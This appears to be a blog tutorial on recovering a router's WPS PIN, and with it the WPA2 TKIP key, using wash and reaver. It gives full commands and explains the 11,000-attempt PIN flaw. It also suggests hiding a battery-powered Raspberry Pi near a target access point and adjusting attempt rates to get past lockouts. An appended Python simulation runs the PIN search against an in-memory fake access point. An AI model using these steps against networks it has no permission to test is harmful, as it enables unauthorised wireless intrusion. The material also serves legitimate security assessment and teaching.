Ok, someone contacted me recently and said this did not work for TKIP and they couldn’t get it working, so this is to show that TKIP can also be bypassed, not just AES, when using ‘reaver’. Thanks for the feedback.
See here for the previous lesson on ‘reaver’ and ‘wash’ to bypass WPA2 AES encryption if you want to read more information on this attack.
You should note that this is not actually breaking the WPA2 AES/TKIP encryption algorithms; it is in fact undermining the inherent trust we place in Wi-Fi Protected Setup (WPS). WPS is there for convenience, so that people don’t need to enter long WPA keys, and for that convenience we have introduced a weakness into our current security model and infrastructure that can be broken very easily.
Think of someone leaving a Raspberry Pi 2 like the one I am using, adding a battery to it and concealing it (or not) in a location near the access point they need to gain access to. The battery will last a lot longer than the assessment requires, and it also gets rid of the risk that comes with the on-line attack; automate the whole process and you don’t need to do anything else to it. You can also do this for normal wireless assessments that don’t involve WPS.
Anyway, first configure your router as follows:
Start monitor mode with airmon-ng. You don’t actually require your card to be in monitor mode for this assessment, but I like to check that the access point details are correct etc., so I just do it out of habit.
Start airodump to check your access point:
airodump-ng mon0 --bssid 00:18:E7:XX:XX:XX -c 6
“airodump-ng” runs airodump-ng
“mon0” is the interface of the card
“--bssid” is for the MAC address of the access point
“-c 6” is to run on channel 6
Output of airodump-ng below. Something else to note here is that no client is attached to the network we are recovering the WPS PIN from. You do not require any clients to be connected to the access point in order to carry out this attack; you are communicating strictly with the access point.
Run wash:
“wash” runs wash
“-i” is for the interface on which you want to capture packets, which is mon0
“-c” is for the channel to listen on in this case 6
Explaining the output below:
BSSID is our target access point MAC address
Channel 6 is the channel of our access point
RSSI is the Received Signal Strength Indication (a minus is a good thing here 😉)
WPS Version which is 1.0
WPS Locked tells you if the access point has been locked due to too many attempts, for example
ESSID is the network name of the access point
As before, just run “reaver” from the terminal for a full list of switches available to you
“reaver” runs reaver
“-i” is to select the sniffing interface in this case mon0
“-b” is followed by the target access point MAC address or BSSID
“-vv” is for very verbose output
“-w” is to mimic a Windows 7 registrar
reaver -i mon0 -b 00:18:E7:XX:XX:XX -vv -w
Excerpt from Stefan Viehböck’s paper, which explains how the WPS communication process works, for design flaw #1:
You only require seven numbers, as the last is a checksum and a ‘zero’. Once the first four numbers are authenticated you then only require a further three numbers in order to get the correct PIN. This in effect makes the cracking process quite trivial to carry out with very little in the way of resources.
design flaw #2:
The brute-force attack then allows you to determine the PIN with a live attack over the air, as a received ‘EAP-NACK’ will tell you whether the PIN is correct or not in only 11,000 attempts. The ‘EAP-NACK’ helps you to determine whether the first or second part of the PIN is correct: when you receive an ‘EAP-NACK’ after M4 or M6 it means that part is incorrect and you are therefore unauthenticated.
So when you look at the output from reaver below you may see it differently now:
I left it to run for the night again.
The total time was 2 hours 01 minute, or ‘7250 seconds’, as you can see above. We can also see the PIN, PSK and AP SSID above, which is the sign of success!
The reaver WPS attack may not work against all access points and you may run into issues. I tried this on my Netgear too and it timed out on me after a certain number of attempts; this needs to be researched further, but you just need to play around with the PIN attempts per second and some of the other options to get it to work. It’s also good to note that reaver will actually save your previous attempts, so you can even break the PIN over a few days if you need to space out your assessment for any reason. It’s not a good idea to have a ‘burned in’ eight-digit PIN as an access method to any system, especially when it’s an easier way into the system than a big long passphrase: it allows you to bypass WPA/2 encryption in a fraction of the time it would take to crack the passphrase after capturing the four-way handshake, and even then you need either a good word-list or a cloud service to crack the unknown faster than you otherwise would.
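The two design flaws above, and the ‘WPS Locked’ / timeout behaviour mentioned in the wash output and the Netgear remark, are easier to see with numbers in front of you. The following is an added illustration, not code from the original post or from reaver: it implements the standard WPS PIN checksum (the same calculation reaver and hostapd use for the eighth digit), and runs the split search against a purely in-memory, constructed stand-in for an access point’s registrar. `SimulatedRegistrarAP`, `recover_pin` and the sample PINs are all hypothetical names and values chosen for this example; nothing here touches a radio.

```python
from dataclasses import dataclass
from typing import Optional, Tuple


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first seven digits of a WPS PIN (the standard
    WSC calculation; this is why only seven digits ever have to be guessed)."""
    accum = 0
    n = first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is eight digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


@dataclass
class SimulatedRegistrarAP:
    """Constructed, in-memory stand-in for an access point's WPS registrar
    (hypothetical model for this example, not a real AP implementation).

    It answers a PIN attempt the way the two design flaws describe: an EAP-NACK
    after M4 when the first half (digits 1-4) is wrong, an EAP-NACK after M6
    when the second half (digits 5-8) is wrong.  lock_after models the
    'WPS Locked' state wash reports for APs that stop answering after a number
    of failed attempts; None means the AP never locks.
    """
    pin: str
    lock_after: Optional[int] = None
    failures: int = 0
    locked: bool = False

    def try_pin(self, first_half: str, second_half: str) -> str:
        if self.locked:
            return "LOCKED"
        if first_half != self.pin[:4]:
            self._record_failure()
            return "M4-NACK"
        if second_half != self.pin[4:]:
            self._record_failure()
            return "M6-NACK"
        return "SUCCESS"

    def _record_failure(self) -> None:
        self.failures += 1
        if self.lock_after is not None and self.failures >= self.lock_after:
            self.locked = True


def recover_pin(ap: SimulatedRegistrarAP) -> Tuple[Optional[str], int]:
    """Split search against the simulated AP: at most 10^4 first halves, then at
    most 10^3 second halves (the eighth digit is computed from the checksum,
    never guessed), so the worst case is 11,000 attempts rather than 10^7.
    Returns (pin or None, number of attempts made)."""
    attempts = 0
    first = None
    for i in range(10_000):
        attempts += 1
        half = f"{i:04d}"
        reply = ap.try_pin(half, "0000")   # second half is only a placeholder here
        if reply == "LOCKED":
            return None, attempts
        if reply == "SUCCESS":
            return half + "0000", attempts
        if reply == "M6-NACK":             # M4 was acknowledged: first half confirmed
            first = half
            break
    if first is None:
        return None, attempts
    for j in range(1_000):
        attempts += 1
        second = f"{j:03d}"
        second += str(wps_checksum(int(first + second)))
        reply = ap.try_pin(first, second)
        if reply == "LOCKED":
            return None, attempts
        if reply == "SUCCESS":
            return first + second, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed sample PINs: 12345670 is the classic valid example (checksum 0).
    print(recover_pin(SimulatedRegistrarAP(pin="12345670")))                # ('12345670', 1803)
    print(recover_pin(SimulatedRegistrarAP(pin="99999995")))                # ('99999995', 11000)
    print(recover_pin(SimulatedRegistrarAP(pin="12345670", lock_after=10))) # (None, 11)
```

The first run shows an ordinary PIN falling in under two thousand attempts; the second is the worst case, which lands exactly on the 11,000 the post quotes; the third shows what a lockout does to the same search, which is the behaviour behind both the ‘WPS Locked’ column in wash and the Netgear timing out, and the reason reaver offers options to slow the attempt rate and to resume from saved attempts.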